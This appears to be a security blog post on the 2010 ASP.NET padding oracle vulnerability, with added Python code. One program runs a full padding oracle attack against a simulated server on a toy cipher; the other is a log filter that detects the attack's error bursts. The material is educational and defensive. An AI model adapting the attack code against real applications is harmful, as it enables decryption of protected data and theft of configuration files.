On 18/09/2010 a Microsoft Security Advisory was released about a security vulnerability in ASP.NET. The vulnerability exists in all versions of ASP.NET, and Microsoft recommended that customers immediately apply a workaround to prevent attackers from using it against ASP.NET applications.
Impact
An attacker exploiting this vulnerability can request and download files that form part of an ASP.NET application, such as the web.config file, which may contain sensitive data. The attacker can also decrypt data the application sends to the client in encrypted form (for example the ViewState hidden field in application responses).
Vulnerability Details
To understand how this vulnerability works, you need to know a little about cryptographic oracles. In cryptography an oracle is a system that leaks information through the way it answers the questions put to it. Here the ASP.NET component that decrypts client-supplied data acts as a padding oracle: an attacker sends modified ciphertext to the web server and learns, from the error code that comes back, whether the decrypted data ended in valid padding. Because the server reports a padding failure differently from every other failure, each answer leaks a little about the plaintext. By sending many such requests (on average 128, and at most 256, per plaintext byte) and watching which errors are returned, the attacker recovers the plaintext byte by byte without ever learning the key.
Attack Properties
In practice the attack makes the web server return thousands of HTTP 500 and 404 error responses (or more, depending on how much data is decrypted) to the malicious client. This means the attacker has to send a very large number of requests to the application to exploit the vulnerability, which is also what makes the attack visible in the logs.
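The following Python program is added here as an illustration of both the mechanism described under Vulnerability Details and the request volume noted under Attack Properties; it is not code from the original post or from Microsoft. It stands a toy four-round Feistel block cipher in for AES (an assumption made so the example runs with the standard library only), uses PKCS#7 padding in CBC mode, models a server that answers 500 on a padding error and 404 or 200 otherwise, and recovers the plaintext from the status codes alone. The class and function names and the secret value "web.config" are all constructed for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16   # 16-byte blocks, as with AES (the cipher ASP.NET actually uses)
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    """Feistel round function (assumption: a toy cipher stands in for AES)."""
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    """Strict PKCS#7 check; the ValueError raised here is what the oracle leaks."""
    if not data or len(data) % BLOCK:
        raise ValueError("bad length")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev, data = [], iv, pkcs7_pad(plaintext)
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(b"".join(out))


class VulnerableServer:
    """Model of the server: 500 on a padding failure, 404 when decryption
    succeeds but names no known resource, 200 otherwise. The difference
    between 500 and the other codes is the padding oracle."""

    def __init__(self, key: bytes, resource: bytes = b"web.config"):
        self.key, self.resource, self.requests = key, resource, 0

    def handle(self, iv: bytes, ct: bytes) -> int:
        self.requests += 1
        try:
            name = cbc_decrypt(self.key, iv, ct)
        except ValueError:
            return 500
        return 200 if name == self.resource else 404


def recover_block(server: VulnerableServer, prev: bytes, target: bytes) -> bytes:
    """Recover one plaintext block. Each query sends a forged IV with `target`
    as a one-block ciphertext, so the server decrypts D(target) XOR forged."""
    inter = bytearray(BLOCK)          # D(target), learned one byte at a time
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):   # force known bytes to the pad value
            forged[j] = inter[j] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if server.handle(bytes(forged), target) == 500:
                continue
            if pos == BLOCK - 1:
                # 02 02 or 03 03 03 also validates; only 01 survives a change
                # of the byte before it, so probe once to rule those out.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if server.handle(bytes(probe), target) == 500:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle gave no valid padding for byte %d" % pos)
    return _xor(bytes(inter), prev)


def padding_oracle_attack(server: VulnerableServer, iv: bytes, ct: bytes) -> bytes:
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(recover_block(server, blocks[i - 1], blocks[i])
                  for i in range(1, len(blocks)))
    return pkcs7_unpad(pt)


if __name__ == "__main__":
    key, iv = os.urandom(16), os.urandom(BLOCK)       # never seen by the attacker
    server = VulnerableServer(key)
    ct = cbc_encrypt(key, iv, b"web.config")          # constructed secret value
    print(padding_oracle_attack(server, iv, ct), "after", server.requests, "requests")
```

Running it recovers the 16-byte padded secret in roughly two thousand requests, every one of them answered with a 404 or 500, which is the traffic pattern a filter has to look for. Note that the attack only ever inspects the status code; the server never returns any decrypted data.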
Mitigation
Microsoft is planning to release a patch to resolve the problem, but what can be done in the meantime? The advisory's own workaround (configuring ASP.NET to return one identical error page for every error, so that a padding failure can no longer be told apart from any other failure) removes the oracle itself and should be applied first.
Beyond that, a security filter can provide a quick and effective additional layer. The filter needs the following abilities combined:
- Detect an abnormal rate of access to URLs in the application.
- Inspect the application's outbound responses and detect error messages.
- Track the access rate per session, not only per source IP (assuming the attacker spreads the requests over many source IPs to stay below per-IP thresholds).
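The following Python program is an added example of the three filter rules above run over a constructed access log; it is not code from the original post or from any product. The log format (ISO time, client IP, session id or "-", method, URL, status), the thresholds, and the session and IP values are all assumptions made for the example. Requests are keyed by session when one is present and fall back to the source IP otherwise, so that spreading the attack over many addresses does not reset the count.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window for the error-rate rule
ERROR_THRESHOLD = 20             # 404/500 replies per client within WINDOW
IP_THRESHOLD = 3                 # distinct source IPs seen for one session
ORACLE_PATHS = ("/WebResource.axd", "/ScriptResource.axd")  # assumed target paths

# Assumed log format: "<iso time> <client ip> <session id or -> <method> <url> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, session, _method, url, status = m.groups()
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "session": session,
            "path": url.split("?", 1)[0], "status": int(status)}


class OracleDetector:
    """Keeps per-client state and returns (rule, client, detail) alerts."""

    def __init__(self):
        self.errors = defaultdict(deque)   # client -> timestamps of error replies
        self.ips = defaultdict(set)        # session -> source IPs seen
        self.fired = set()                 # (rule, client) already reported

    def _alert(self, rule, client, detail):
        if (rule, client) in self.fired:
            return []
        self.fired.add((rule, client))
        return [(rule, client, detail)]

    def feed(self, e):
        alerts = []
        # Key on the session when the client presents one, else on the IP.
        client = e["session"] if e["session"] != "-" else e["ip"]
        if e["session"] != "-":
            self.ips[client].add(e["ip"])
            if len(self.ips[client]) >= IP_THRESHOLD:
                alerts += self._alert("multi-ip", client,
                                      "%d source IPs" % len(self.ips[client]))
        if e["path"] in ORACLE_PATHS and e["status"] in (404, 500):
            q = self.errors[client]
            q.append(e["ts"])
            while q and e["ts"] - q[0] > WINDOW:   # drop replies outside the window
                q.popleft()
            if len(q) >= ERROR_THRESHOLD:
                alerts += self._alert("error-burst", client,
                                      "%d error replies in %ds" % (len(q), WINDOW.seconds))
        return alerts


def scan(log_text):
    det, alerts = OracleDetector(), []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e:
            alerts.extend(det.feed(e))
    return alerts


def constructed_log():
    """Constructed sample (not a real server log): one normal session and one
    session that hammers WebResource.axd with bad ciphertexts from three IPs."""
    lines = [
        "2010-09-18T10:00:00 198.51.100.7 sessA GET /Default.aspx 200",
        "2010-09-18T10:00:01 198.51.100.7 sessA GET /WebResource.axd?d=ok 200",
        "2010-09-18T10:00:05 198.51.100.7 sessA GET /Missing.aspx 404",
    ]
    ips = ["203.0.113.1", "203.0.113.2", "203.0.113.3"]
    for i in range(30):
        lines.append("2010-09-18T10:01:%02d %s sessB GET /WebResource.axd?d=g%d 500"
                     % (i, ips[i % 3], i))
    return "\n".join(lines)


if __name__ == "__main__":
    for rule, client, detail in scan(constructed_log()):
        print(rule, client, detail)
```

On the constructed log the normal session raises nothing (its single 404 is not on an oracle path), while the attacking session trips the multi-IP rule on its third address and the error-burst rule on its twentieth error reply within the window. The thresholds are deliberately low for the example; a real deployment would tune them against the application's normal error rate.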